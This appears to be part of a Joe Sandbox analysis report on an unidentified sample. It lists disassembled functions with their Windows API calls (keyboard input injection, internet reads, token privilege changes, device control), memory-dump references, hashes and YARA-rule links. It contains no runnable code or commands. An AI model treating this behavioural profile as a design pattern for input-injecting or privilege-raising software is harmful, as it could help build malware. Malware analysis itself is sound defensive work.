Function 00DD4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00DD439C
SetKeyboardState.USER32(00000080,?,00000001), ref: 00DD43B8
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00DD4425
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00DD4483

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 53ce3d793a08e1b58f911d7d6011389b28f11308215cb93775b10b3cbeb20a73
Instruction ID: 9777da327a223d0d5d84d33553d92763bd38c908bf4054860eab55c5812a4e5f
Opcode Fuzzy Hash: 53ce3d793a08e1b58f911d7d6011389b28f11308215cb93775b10b3cbeb20a73
Instruction Fuzzy Hash: 5741F5B0A44248AFEF208BA5D844BFD7BB9AB55311F08415BF4C5A23C1C7B489C59772

Function 00DFEFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

GetCursorPos.USER32(?), ref: 00DFEFE2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E0F3C3,?,?,?,?,?), ref: 00DFEFF7
GetCursorPos.USER32(?), ref: 00DFF041
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E0F3C3,?,?,?), ref: 00DFF077

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: da35e1a5c5dc07c8687546a2b5a1b48313bc2fdfa5947bcc7e6aaf2d10ecbe8c
Instruction ID: 48d2b4f675feb3c40812f4ea366d71de8fd5b4ac3d01292a2dc80d74da35a24a
Opcode Fuzzy Hash: da35e1a5c5dc07c8687546a2b5a1b48313bc2fdfa5947bcc7e6aaf2d10ecbe8c
Instruction Fuzzy Hash: 3C21E135500128EFCB298F55CC99FFA7BB5EF49750F088069FA05672A2C7319D51DBA0

Function 00DD220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DD221E

Strings

|, xrefs: 00DD224E
(, xrefs: 00DD2264

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 06bb5f2b783710ff3321b35e5cae0c1151f0990b40b4860c30e7f78bb33eead3
Instruction ID: 34e24d8e06e8fd05716ebe10cf31a3fdb890fa537cda71ab85796ff039273fdc
Opcode Fuzzy Hash: 06bb5f2b783710ff3321b35e5cae0c1151f0990b40b4860c30e7f78bb33eead3
Instruction Fuzzy Hash: 0F321475A007059FC728CF69C481AAAB7F0FF58320B15C46EE49ADB7A1E770E941CB64

Function 00DAAD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00DAAE5E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 9729e483f1e012f7b8aae9ec0f7c8f29cfa6fb176dc3e1419b9a682f45fc3dd0
Instruction ID: dd19fd0f7ecbfd11bb1282dd35451545f9dc411914cbab8ad5cdc3666a7fc80e
Opcode Fuzzy Hash: 9729e483f1e012f7b8aae9ec0f7c8f29cfa6fb176dc3e1419b9a682f45fc3dd0
Instruction Fuzzy Hash: A3A11860204205BEDB38AB2D8C88EBF3A5CEF43755B144729F582E65E1EB29CD51D273

Function 00DE550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DE4A1E,00000000), ref: 00DE55FD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00DE5629

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 36b4ac67c2f7c5cfe618039de569400ab7c8cb0e8768f2b0ba7b4d7ae2e3ca66
Instruction ID: 42c760c85eac9fc7c6d64f55295d5031ecc13d0f3295f3358e9312162e1724bd
Opcode Fuzzy Hash: 36b4ac67c2f7c5cfe618039de569400ab7c8cb0e8768f2b0ba7b4d7ae2e3ca66
Instruction Fuzzy Hash: D1411471500A48FFEB10AE96EC81EBFB7BDEB4039CF14401EF206A6185DA709E409B70

Function 00DDEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DDEA95
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DDEAEF
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00DDEB3C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 36e11d36bbf212ab80396f6bcc9cb7691dfa7f957a2ff81507208f24d45ee549
Instruction ID: b3b9b8ce8e34de83aa087213ef2c0f5b3ffcb9a392c1ca394310b32afc4be3ba
Opcode Fuzzy Hash: 36e11d36bbf212ab80396f6bcc9cb7691dfa7f957a2ff81507208f24d45ee549
Instruction Fuzzy Hash: C7213135A00218EFCB00DFA5D895AEDBBB4FF49310F15849AE945AB351DB31D915CB60

Function 00DD70AE Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DD70D8
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00DD7115
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DD711E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: b079a015286b81bb7c83bfeb190538a9e5f65ddfc2c124a2a2715fd79f2b598d
Instruction ID: 09570125fe546172568d939ebe159d8259530524902e3d3b4c357e9f3c85b749
Opcode Fuzzy Hash: b079a015286b81bb7c83bfeb190538a9e5f65ddfc2c124a2a2715fd79f2b598d
Instruction Fuzzy Hash: D011A5B1A04229BEE7108BA8DC45FEF77BCEB08714F004656B901F7290D2B49E0487E1

Function 00DAAFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

Part of subcall function 00DAB155: GetWindowLongW.USER32(?,000000EB), ref: 00DAB166

GetParent.USER32(?), ref: 00E0F4B5
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00DAADDD,?,?,?,00000006,?), ref: 00E0F52F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: 06cfedad472128cbcb072a6d12f279f835ebb63d22a721fec2e6f940d974c37b
Instruction ID: 792795dfb9f348e92e3a0388bebbd4db47552c86ed642d92d356989977784249
Opcode Fuzzy Hash: 06cfedad472128cbcb072a6d12f279f835ebb63d22a721fec2e6f940d974c37b
Instruction Fuzzy Hash: 94216F31200104AFCB388F28DC49AAA3BA2EB47374F185665F5396B2E3C7319D56D765

Function 00DFF0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00E0F352,?,?,?), ref: 00DFF115

Part of subcall function 00DAB155: GetWindowLongW.USER32(?,000000EB), ref: 00DAB166

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00DFF0FB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 5216034329fa268ab573e87293a377a19822ce7a9f0f0ddc1d22d0ae63b9a378
Instruction ID: a953019d4c0a2898216de2900e42930ce93c7ac79aae4d9032bd1130fa71f27e
Opcode Fuzzy Hash: 5216034329fa268ab573e87293a377a19822ce7a9f0f0ddc1d22d0ae63b9a378
Instruction Fuzzy Hash: 4001B131200308EFCB259F15DC45FBA3BA6FF86364F198564FA555B2A1C7329806DB71

Function 00DFF45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00DFF47D
NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00E0F42E,?,?,?,?,?), ref: 00DFF4A6

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: f096f593e307cbe07fa08e337e99ca886d878b75d56b823a09ca6ec8f707fe9d
Instruction ID: 62725100484f6d1d2e0a601add76214a91dd47045223e9b5af8401c35d884670
Opcode Fuzzy Hash: f096f593e307cbe07fa08e337e99ca886d878b75d56b823a09ca6ec8f707fe9d
Instruction Fuzzy Hash: 51F01772400118FFEB049F96DC09AEE7BB9FF48351F14805AFA02A2160D3B5AA55EB60

Function 00DDD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00DEC2E2,?,?,00000000,?), ref: 00DDD73F
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00DEC2E2,?,?,00000000,?), ref: 00DDD751

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: cc807aa50792616107eb458f685f14c2b61b7f6e6e9ff1415159846d034e3f1d
Instruction ID: 086bd840e393ba368b26c53720f4e5f83205187fa6a4a3ddcc681353e0311443
Opcode Fuzzy Hash: cc807aa50792616107eb458f685f14c2b61b7f6e6e9ff1415159846d034e3f1d
Instruction Fuzzy Hash: 3FF08C3510432DBBDB21AFA4CC49FEA7B6DEF493A1F008156B91AE7191D630DA44CBB0

Function 00DD4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DD4B89
keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00DD4B9C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: bd9693ebb7b2af5f7d3e4c1a8b7866237074123588be4fe878953afb7d2f3eae
Instruction ID: e310c207e8bd8c138b431061ebaed1d82dab90f90d5745c509c51fa30d7abbb3
Opcode Fuzzy Hash: bd9693ebb7b2af5f7d3e4c1a8b7866237074123588be4fe878953afb7d2f3eae
Instruction Fuzzy Hash: F8F0177090424EAFEB058FA5C806BBE7BB4AF04305F04C40AF965A6291D7B9C6169FA4

Function 00DCB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DCB9EC), ref: 00DCB8C5
CloseHandle.KERNEL32(?,?,00DCB9EC), ref: 00DCB8D7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 9cec32251777c6b1ccc4bc93535924b47c8572924642429f9da83d76ef42e408
Instruction ID: 844f454b290ab6a94b51b3893d903bfe2f090c1dc406c5810a1e7e85f25761ec
Opcode Fuzzy Hash: 9cec32251777c6b1ccc4bc93535924b47c8572924642429f9da83d76ef42e408
Instruction Fuzzy Hash: 00E0B672004611EEE7262B65EC09DB77BEAEF08361B14C92AF49681470DB62AC94DB20

Function 00DFF594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00DFF59C
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00E0F3AD,?,?,?,?), ref: 00DFF5C6

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 45c29d5133247b029e25372056c1ee5762b9f6b4831ad2ab08778aeb8f70e360
Instruction ID: 07c008c5c6c90e98c57bd99e0db6d16abd5de267bccd03877778aa5130ecd692
Opcode Fuzzy Hash: 45c29d5133247b029e25372056c1ee5762b9f6b4831ad2ab08778aeb8f70e360
Instruction Fuzzy Hash: 8AE08C7010822CBBEB151F1ADC0AFB93B29EB00B50F10C526FA56D80E0D7B088A0D660

Function 00DB8E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,00D9125D,00DB7A43,00D90F35,?,?,00000001), ref: 00DB8E41
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00DB8E4A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 093b99e2cc243aa328c12945504d1ead541291356e756502cc6187e63a96719e
Instruction ID: b09f3bc44e96d257954cb48ebaae01606172c2c4e7bcf630895ac96145962edd
Opcode Fuzzy Hash: 093b99e2cc243aa328c12945504d1ead541291356e756502cc6187e63a96719e
Instruction Fuzzy Hash: ABB09271048A08AFEA002FA2EC09BC83F68EB08A72F008010F62D54060CB6354548A92

Function 00DC113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db7f7cda19f7d2482e19caa47c3fbc9bd553125fa3875f51d328540f4361416
Instruction ID: 24b3239597c6332d37fadf7cc900f7bc45f4a93327d47130d4e78e1b96146bcd
Opcode Fuzzy Hash: 3db7f7cda19f7d2482e19caa47c3fbc9bd553125fa3875f51d328540f4361416
Instruction Fuzzy Hash: EEB11221D2AF514DD323963A8D31336B65CAFBB2D5F91D71BFC2A70D62EB2181874180

Function 00E002AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00E00352

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
